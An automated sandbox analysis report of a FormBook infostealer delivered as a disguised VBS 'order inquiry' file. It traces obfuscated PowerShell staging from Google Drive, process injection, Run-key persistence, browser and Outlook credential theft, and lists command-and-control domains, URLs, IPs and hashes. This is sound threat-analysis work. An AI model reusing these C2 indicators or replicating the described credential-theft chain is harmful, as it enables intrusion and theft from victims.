          Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\ktmutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2981468701.0000000001200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2981799081.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2447450866.0000000022690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2446978661.00000000216E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information321
          Scripting          		Valid Accounts11
          Windows Management Instrumentation          		321
          Scripting          		1
          Abuse Elevation Control Mechanism          		11
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		2
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		3
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		LSASS Memory114
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts21
          Command and Scripting Interpreter          		1
          Registry Run Keys / Startup Folder          		412
          Process Injection          		4
          Obfuscated Files or Information          		Security Account Manager221
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		4
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          PowerShell          		Login Hook1
          Registry Run Keys / Startup Folder          		1
          Software Packing          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput Capture5
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Masquerading          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
          Virtualization/Sandbox Evasion          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job412
          Process Injection          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1511860 Sample: Order Inquiry RFQ #278823_pdf.vbs Startdate: 16/09/2024 Architecture: WINDOWS Score: 100 51 www.lotlizard.host 2->51 53 www.amkmos.online 2->53 55 5 other IPs or domains 2->55 69 Multi AV Scanner detection for domain / URL 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 Yara detected FormBook 2->73 75 7 other signatures 2->75 13 wscript.exe 1 2->13         started        16 wabmig.exe 2->16         started        18 wabmig.exe 4 2->18         started        signatures3 process4 signatures5 101 VBScript performs obfuscated calls to suspicious functions 13->101 103 Suspicious powershell command line found 13->103 105 Wscript starts Powershell (via cmd or directly) 13->105 107 4 other signatures 13->107 20 powershell.exe 14 20 13->20         started        process6 dnsIp7 57 drive.google.com 142.250.185.110, 443, 49730, 49731 GOOGLEUS United States 20->57 59 drive.usercontent.google.com 142.250.185.193, 443, 49732, 49740 GOOGLEUS United States 20->59 77 Obfuscated command line found 20->77 79 Very long command line found 20->79 81 Found suspicious powershell code related to unpacking or dynamic code loading 20->81 24 cmd.exe 1 20->24         started        27 cmd.exe 1 20->27         started        29 conhost.exe 20->29         started        signatures8 process9 signatures10 87 Suspicious powershell command line found 24->87 89 Wscript starts Powershell (via cmd or directly) 24->89 91 Very long command line found 24->91 31 powershell.exe 15 24->31         started        process11 signatures12 111 Writes to foreign memory regions 31->111 113 Found suspicious powershell code related to unpacking or dynamic code loading 31->113 34 wabmig.exe 6 31->34         started        37 cmd.exe 1 31->37         started        process13 signatures14 67 Maps a DLL or memory area into another process 34->67 39 osqpHpjBCXXA.exe 34->39 injected process15 signatures16 83 Maps a DLL or memory area into another process 39->83 85 Found direct / indirect Syscall (likely to bypass EDR) 39->85 42 ktmutil.exe 1 13 39->42         started        process17 signatures18 93 Tries to steal Mail credentials (via file / registry access) 42->93 95 Tries to harvest and steal browser information (history, passwords, etc) 42->95 97 Modifies the context of a thread in another process (thread injection) 42->97 99 3 other signatures 42->99 45 osqpHpjBCXXA.exe 42->45 injected 49 firefox.exe 42->49         started        process19 dnsIp20 61 www.freel2charger.com 64.98.135.118, 49742, 80 TUCOWS-3CA Canada 45->61 63 www.hsck520.com 35.190.52.58, 49747, 49748, 80 GOOGLEUS United States 45->63 65 lotlizard.host 66.29.141.40, 49743, 49744, 49745 ADVANTAGECOMUS United States 45->65 109 Found direct / indirect Syscall (likely to bypass EDR) 45->109 signatures21

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Order Inquiry RFQ #278823_pdf.vbs5%ReversingLabs

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          www.hsck520.com5%VirustotalBrowse
          lotlizard.host1%VirustotalBrowse
          www.freel2charger.com0%VirustotalBrowse
          drive.google.com0%VirustotalBrowse
          www.amkmos.online10%VirustotalBrowse
          www.lotlizard.host1%VirustotalBrowse
          drive.usercontent.google.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          https://aka.ms/pscore680%URL Reputationsafe
          https://apis.google.com0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://drive.usercontent.google.com0%Avira URL Cloudsafe
          http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
          https://go.micro0%Avira URL Cloudsafe
          http://www.lotlizard.host/alsy/?7JP=sFIZ3H46VDCFAxrc+oKxfEwJKwyB2GbujsubN54cMZ3ZKYO7DzbSb11HbeOZoAajDYdufGPs+3X3MuSwdoj2w4DFbeRQQ/e5pVDNloXMU4Bz0KAn7Ijiyww=&yD74=KV788dEH10%Avira URL Cloudsafe
          http://www.hsck520.com/hfh5/0%Avira URL Cloudsafe
          http://www.microsoft.co0%Avira URL Cloudsafe
          https://drive.usercontent.google.com/$0%Avira URL Cloudsafe
          https://drive.usercontent.google.com/0%Avira URL Cloudsafe
          https://drive.googP0%Avira URL Cloudsafe
          https://drive.usercontent.googh:0%Avira URL Cloudsafe
          http://drive.google.com0%Avira URL Cloudsafe
          https://drive.usercontent.google.com/P0%Avira URL Cloudsafe
          http://www.freel2charger.com/43cj/?yD74=KV788dEH1&7JP=T5xbhsi5FuhzvTEQw2+KT2FsHNx9t47tozcKf+wmva0DEtOyEm69qyqfdc34c7IFdYZ32FzEk2z+82aLMtRHRH5540be2ISaKbwCt+kNSrDfOHoX6kdHk1g=0%Avira URL Cloudsafe
          https://github.com/Pester/Pester0%Avira URL Cloudsafe
          https://drive.google.com/C0%Avira URL Cloudsafe
          https://www.google.com0%Avira URL Cloudsafe
          https://aka.ms/pscore6lB0%Avira URL Cloudsafe
          https://drive.google.com/0%Avira URL Cloudsafe
          http://www.lotlizard.host/alsy/0%Avira URL Cloudsafe
          https://drive.google.com0%Avira URL Cloudsafe
          https://drive.usercontent.google.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.hsck520.com
          		35.190.52.58
          		truefalseunknown
          lotlizard.host
          		66.29.141.40
          		truefalseunknown
          www.freel2charger.com
          		64.98.135.118
          		truefalseunknown
          drive.google.com
          		142.250.185.110
          		truefalseunknown
          drive.usercontent.google.com
          		142.250.185.193
          		truefalseunknown
          www.amkmos.online
          		unknown
          		unknowntrueunknown
          www.lotlizard.host
          		unknown
          		unknowntrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://www.hsck520.com/hfh5/false
          • Avira URL Cloud: safe
          		unknown
          http://www.lotlizard.host/alsy/?7JP=sFIZ3H46VDCFAxrc+oKxfEwJKwyB2GbujsubN54cMZ3ZKYO7DzbSb11HbeOZoAajDYdufGPs+3X3MuSwdoj2w4DFbeRQQ/e5pVDNloXMU4Bz0KAn7Ijiyww=&yD74=KV788dEH1false
          • Avira URL Cloud: safe
          		unknown
          http://www.freel2charger.com/43cj/?yD74=KV788dEH1&7JP=T5xbhsi5FuhzvTEQw2+KT2FsHNx9t47tozcKf+wmva0DEtOyEm69qyqfdc34c7IFdYZ32FzEk2z+82aLMtRHRH5540be2ISaKbwCt+kNSrDfOHoX6kdHk1g=false
          • Avira URL Cloud: safe
          		unknown
          http://www.lotlizard.host/alsy/false
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://drive.usercontent.google.compowershell.exe, 00000001.00000002.2302097105.000001F2A0DC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A11E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DBE000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2302097105.000001F29F346000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2302097105.000001F29F346000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://go.micropowershell.exe, 00000001.00000002.2302097105.000001F29FCEB000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://drive.usercontent.google.com/$wabmig.exe, 0000000A.00000002.2434620654.0000000005E08000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.microsoft.copowershell.exe, 00000006.00000002.2221760380.00000000075A5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://contoso.com/Licensepowershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://contoso.com/Iconpowershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://drive.googPpowershell.exe, 00000001.00000002.2302097105.000001F2A089A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0F0F000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://drive.usercontent.google.com/wabmig.exe, 0000000A.00000002.2434687494.0000000005E71000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://drive.usercontent.googh:powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://drive.google.compowershell.exe, 00000001.00000002.2302097105.000001F2A0F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://drive.usercontent.google.com/Pwabmig.exe, 0000000A.00000002.2434620654.0000000005E08000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2302097105.000001F29F346000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://drive.google.com/Cwabmig.exe, 0000000A.00000002.2434620654.0000000005E08000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.google.compowershell.exe, 00000001.00000002.2302097105.000001F29F59E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5B6000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178528179.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E6A000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.2216604183.00000000048F1000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://drive.google.com/wabmig.exe, 0000000A.00000002.2434620654.0000000005E08000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://contoso.com/powershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://drive.google.compowershell.exe, 00000001.00000002.2302097105.000001F29F5CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A089A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0F0F000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://drive.usercontent.google.compowershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A11E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://aka.ms/pscore68powershell.exe, 00000001.00000002.2302097105.000001F29F121000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://apis.google.compowershell.exe, 00000001.00000002.2302097105.000001F29F59E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F2A0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2302097105.000001F29F5B6000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178528179.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2178455364.0000000005E6A000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2302097105.000001F29F121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2216604183.00000000048F1000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          142.250.185.193
          		drive.usercontent.google.comUnited States
          		15169GOOGLEUSfalse
          35.190.52.58
          		www.hsck520.comUnited States
          		15169GOOGLEUSfalse
          142.250.185.110
          		drive.google.comUnited States
          		15169GOOGLEUSfalse
          64.98.135.118
          		www.freel2charger.comCanada
          		32491TUCOWS-3CAfalse
          66.29.141.40
          		lotlizard.hostUnited States
          		19538ADVANTAGECOMUSfalse

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1511860
          Start date and time:2024-09-16 14:44:05 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 9m 26s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:16
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:2
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:Order Inquiry RFQ #278823_pdf.vbs
          Detection:MAL
          Classification:mal100.troj.spyw.expl.evad.winVBS@20/8@6/5
          EGA Information:
          • Successful, ratio: 40%
          HCA Information:
          • Successful, ratio: 94%
          • Number of executed functions: 133
          • Number of non-executed functions: 273
          Cookbook Comments:
          • Found application associated with file extension: .vbs

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target osqpHpjBCXXA.exe, PID 824 because it is empty
          • Execution Graph export aborted for target powershell.exe, PID 7512 because it is empty
          • Execution Graph export aborted for target powershell.exe, PID 7944 because it is empty
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          08:45:03API Interceptor10602x Sleep call for process: powershell.exe modified
          08:46:47API Interceptor16x Sleep call for process: ktmutil.exe modified
          13:46:17AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run KB60QNXX7JN C:\Program Files (x86)\windows mail\wabmig.exe
          13:46:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run KB60QNXX7JN C:\Program Files (x86)\windows mail\wabmig.exe

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          66.29.141.40SHUYOU #U65b0#U6307#U4ee4 PO-2301010 03-07-2024.pdf.exeGet hashmaliciousFormBookBrowse
          • www.lotlizard.host/kyo8/
          Payment.exeGet hashmaliciousFormBookBrowse
          • www.lotlizard.host/nn9z/

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          www.freel2charger.comOrderPI.exeGet hashmaliciousFormBookBrowse
          • 64.98.135.118

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          ADVANTAGECOMUShttps://jcs9p1lk.r.us-east-2.awstrack.me/L0/https:%2F%2Ffenikas.com%2F808994372848913878674621th2sxgen-pgx-624401346368-ifxshipping-isxlatsco.comsf-1MC4w/1/010f0191e4458a77-88cb0572-2458-4d31-b716-cc415eda7b17-000000/NA8iZFGpHvmagHF8-6AAmKi7_8M=176Get hashmaliciousHTMLPhisherBrowse
          • 66.29.141.215
          http://jnhxqc.com/Get hashmaliciousUnknownBrowse
          • 66.29.132.221
          http://jnhxqc.com/Get hashmaliciousUnknownBrowse
          • 66.29.132.221
          https://www.tiktok.com/////link/v2?aid=1988&lang=enwzuw&scene=bio_url&target=google.com.////amp/s/iammyvision.org/99011/098892/amltQHBhdG9icmllbi5jb20=Get hashmaliciousEvilProxy, HTMLPhisherBrowse
          • 66.29.131.166
          https://petpolite.com/de-en/booking/card.phpGet hashmaliciousUnknownBrowse
          • 66.29.146.64
          TF1--90.AE.473- ARCA.exeGet hashmaliciousFormBookBrowse
          • 66.29.149.180
          PJS-4021339 IND.exeGet hashmaliciousFormBookBrowse
          • 66.29.149.180
          220204-TF1--00.exeGet hashmaliciousFormBookBrowse
          • 66.29.149.180
          https://url.au.m.mimecastprotect.com/s/PfBWC4QZ15ukx20VsOfYC4BNEn?domain=incleecl.comGet hashmaliciousUnknownBrowse
          • 66.29.141.225
          20-EM-00- PI-INQ-3001.exeGet hashmaliciousFormBookBrowse
          • 66.29.149.180
          TUCOWS-3CAhttps://qeosys.nl/1/index.html?utm_source=promotions&utm_medium=email&utm_campaign=#ann@virtualintelligencebriefing.comGet hashmaliciousUnknownBrowse
          • 64.98.135.17
          b2bXo6vmDm.exeGet hashmaliciousSystemBCBrowse
          • 64.98.38.4
          file.exeGet hashmaliciousSystemBCBrowse
          • 64.98.38.5
          file.exeGet hashmaliciousSystemBCBrowse
          • 64.98.38.5
          eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
          • 64.98.135.90
          appdrivesound.exeGet hashmaliciousSystemBCBrowse
          • 64.98.38.4
          5CxmQXL0LD.exeGet hashmaliciousSystemBCBrowse
          • 64.98.38.4
          http://lexew97591vreaa.pages.dev/Get hashmaliciousHTMLPhisherBrowse
          • 64.98.38.203
          205.185.124.50-x86-2024-07-03T23_47_55.elfGet hashmaliciousMirai, MoobotBrowse
          • 64.98.180.3
          yq5xNPpWCT.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
          • 64.98.36.4

          JA3 Fingerprints

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          3b5074b1b5d032e5620f69f9f700ff0ehttps://hachidori87.com/wp-content/Magenta/MagentaGet hashmaliciousPhisherBrowse
          • 142.250.185.193
          • 142.250.185.110
          https://linkin.bio/sibiliaGet hashmaliciousHTMLPhisherBrowse
          • 142.250.185.193
          • 142.250.185.110
          Quotation QT-433.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
          • 142.250.185.193
          • 142.250.185.110
          Shipping Document.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
          • 142.250.185.193
          • 142.250.185.110
          SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeGet hashmaliciousUnknownBrowse
          • 142.250.185.193
          • 142.250.185.110
          OTPAuthenticator.wsfGet hashmaliciousAsyncRATBrowse
          • 142.250.185.193
          • 142.250.185.110
          Documenti di spedizione 00039488580006996960.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
          • 142.250.185.193
          • 142.250.185.110
          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDDtrigyycT&sa=t&esrc=DtrigFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJFpgpgNlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fs%C2%ADq%C2%ADt%C2%ADem%C2%ADpl%C2%ADo%C2%AD.%C2%ADc%C2%ADl//wp-includes/pomo/.dev//hji6ufuo/Z2lhY29tb2dpb3JnaW8uY2VudHJpdHRvQG1wcy5pdA===$%E3%80%82&data=05%7C02%7Cgiacomogiorgio.centritto@mps.it%7C7c1a2223a79d4fd6fd7a08dcd51521b8%7C402b15a57cb94d1b85a349542f8bd230%7C0%7C0%7C638619533982563608%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=eMy46hqDEiP5rHA2M0xAW5wG1Dj23+pTKoHkIPweAEc=&reserved=0Get hashmaliciousHTMLPhisherBrowse
          • 142.250.185.193
          • 142.250.185.110
          September PO.exeGet hashmaliciousAgentTeslaBrowse
          • 142.250.185.193
          • 142.250.185.110
          TT USD 170,196 - 16.9.2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
          • 142.250.185.193
          • 142.250.185.110
          37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousVidarBrowse
          • 142.250.185.193
          • 142.250.185.110
          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
          • 142.250.185.193
          • 142.250.185.110
          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
          • 142.250.185.193
          • 142.250.185.110
          SecuriteInfo.com.Trojan.DownLoader47.29560.1466.27356.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
          • 142.250.185.193
          • 142.250.185.110
          Est_US091024A - PICTURE.exeGet hashmaliciousAzorult, GuLoaderBrowse
          • 142.250.185.193
          • 142.250.185.110
          SwiftMesaj.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
          • 142.250.185.193
          • 142.250.185.110
          rfq_last_quater_product_purchase_order_import_list_16_06_2024_000000160924.bat.exeGet hashmaliciousRemcosBrowse
          • 142.250.185.193
          • 142.250.185.110
          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
          • 142.250.185.193
          • 142.250.185.110
          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
          • 142.250.185.193
          • 142.250.185.110
          UzOiLxrF4d.exeGet hashmaliciousAmadey, NeoreklamiBrowse
          • 142.250.185.193
          • 142.250.185.110

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:modified
          Size (bytes):11608
          Entropy (8bit):4.8908305915084105
          Encrypted:false
          SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
          MD5:FE1902820A1CE8BD18FD85043C4D9C5C
          SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
          SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
